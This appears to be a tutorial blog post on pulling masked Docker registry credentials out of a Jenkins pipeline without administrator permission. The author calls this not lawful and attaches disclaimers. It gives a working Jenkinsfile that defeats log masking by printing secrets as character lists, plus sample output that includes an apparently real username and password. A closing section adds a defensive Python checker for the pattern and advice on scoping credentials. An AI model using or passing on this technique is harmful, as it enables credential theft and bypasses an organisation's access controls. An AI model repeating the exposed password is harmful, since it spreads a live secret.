How to Retrieve Secret Credentials from Jenkins for Docker Registry

First off, I want to state that what I'm about to describe isn't lawful. If you need access to secret credentials, you should request them from your administrator. I am not responsible for any misuse of this information.

Understanding Our Goal

The aim is to obtain secret keys for Docker registry repositories accessible from a pipeline.

The Problem

When a pipeline runs, Docker registry credentials aren't exposed in the output. This is a security measure; credentials are replaced with asterisks, like so:

docker login -u jenkins-projects -p ******** https://your_jenkins.com

The issue arises when you're not a Jenkins administrator and, therefore, can't know the password. Often, companies won't provide this information for security reasons. They might give you a user account to download from the Docker registry, but the only way to upload images is through Jenkins, which can be frustrating in some scenarios.

How You Could Retrieve These Credentials

You could potentially use the same pipeline to retrieve these credentials. Here's my code example:

pipeline {
  agent any
  stages {
    stage('usernamePassword') {
      steps {
        script {
          withCredentials([
            usernamePassword(credentialsId: 'svn', //replace the ID of your secret key
              usernameVariable: 'username',
              passwordVariable: 'password')
          ]) {
            print 'username=' + username + 'password=' + password

            print 'username.collect { it }=' + username.collect { it }
            print 'password.collect { it }=' + password.collect { it }
          }
        }
      }
    }

// end

  }
}

Note that you must replace the credentials ID (svn in this example) with the ID of your own secret.

Understanding the Output of the Previous Code

The output from the above code will look like this:

18:02:32  [Pipeline] }
18:02:32  [Pipeline] // stage
18:02:32  [Pipeline] withEnv
18:02:32  [Pipeline] {
18:02:32  [Pipeline] stage
18:02:32  [Pipeline] { (usernamePassword)
18:02:33  [Pipeline] script
18:02:33  [Pipeline] {
18:02:33  [Pipeline] withCredentials
18:02:33  Masking supported pattern matches of $username or $password
18:02:33  [Pipeline] {
18:02:33  [Pipeline] echo
18:02:33  username=****password=****
18:02:33  [Pipeline] echo
18:02:33  username.collect { it }=[j, e, n, k, i, n, s, -, c, c, -, i, d, -, p, p, p, -, e, i, d]
18:02:33  [Pipeline] echo
18:02:33  password.collect { it }=[l, p, l, q, V, F, l, r, 6, 6, W, g, X, F, O, F, 5, 6, N, B]
18:02:33  [Pipeline] }
18:02:33  [Pipeline] // withCredentials
18:02:33  [Pipeline] }
18:02:33  [Pipeline] // script
18:02:33  [Pipeline] }
18:02:33  [Pipeline] // stage
18:02:33  [Pipeline] }
18:02:33  [Pipeline] // withEnv
18:02:33  [Pipeline] }
18:02:33  [Pipeline] // node
18:02:33  [Pipeline] End of Pipeline
18:02:33  [Bitbucket] Notifying commit build result
18:02:33  [Bitbucket] Build result notified
18:02:33  Finished: SUCCESS

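You'll notice that the plain print is masked, but the username.collect and password.collect lines show the username and password as lists of single characters. Masking only replaces the bound values where they appear intact in the log, so the split-up form passes through; just remove the commas to get what you need.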

Username: jenkins-cc-id-ppp-eid

Password: lplqVFlr66WgXFOF56NB
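
A pre-merge check for the pattern shown above, as an added example that is not part of the original gist: it lists the variables a Jenkinsfile binds with withCredentials and flags lines where pipeline (Groovy) code touches them outside a single-quoted string. The sample Jenkinsfile, the registry host and the function names are constructed for illustration.

```python
import re

# Variable names bound by withCredentials (usernamePassword / string bindings).
BINDING = re.compile(r"\b(?:usernameVariable|passwordVariable|variable)\s*:\s*['\"](\w+)['\"]")
# Groovy leaves single-quoted strings alone, so "$password" inside sh '...' is
# expanded by the shell on the agent, not by pipeline code.
SINGLE_QUOTED = re.compile(r"'(?:[^'\\]|\\.)*'")
LINE_COMMENT = re.compile(r"//.*$")

def bound_variables(jenkinsfile):
    """Names that hold secret values inside the withCredentials block."""
    return set(BINDING.findall(jenkinsfile))

def review(jenkinsfile):
    """Return (line_no, variable, reason) for Groovy-level uses of bound secrets."""
    names = sorted(bound_variables(jenkinsfile))
    findings = []
    for no, line in enumerate(jenkinsfile.splitlines(), 1):
        if BINDING.search(line):
            continue  # the binding declaration itself
        code = LINE_COMMENT.sub("", SINGLE_QUOTED.sub("''", line))
        for name in names:
            if re.search(rf"\b{name}\s*\.\s*\w+", code):
                findings.append((no, name, "method call on secret"))
            elif re.search(rf"\b{name}\b", code):
                findings.append((no, name, "secret used in Groovy expression"))
    return findings

# Constructed sample: the gist's binding, one shell-only use, and its two prints.
SAMPLE = '''\
withCredentials([
  usernamePassword(credentialsId: 'svn',
    usernameVariable: 'username',
    passwordVariable: 'password')
]) {
  sh 'docker login -u "$username" -p "$password" registry.example.invalid'
  print 'username=' + username + 'password=' + password
  print 'password.collect { it }=' + password.collect { it }
}
'''

if __name__ == "__main__":
    for no, name, reason in review(SAMPLE):
        print(f"line {no}: {name}: {reason}")
```

Text matching of this kind is a review aid and can be evaded. The control that holds is scoping credentials (for example to a folder) so that jobs whose Jenkinsfile a non-administrator can edit cannot bind them.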

The following link serves as a clear reference for my code: Accessing and Dumping Jenkins Credentials

Disclaimer: This post is for educational purposes only. Manipulating or accessing credentials without authorization is unethical and likely violates terms of service and legal agreements. Always follow your organization's policies and procedures for managing credentials.
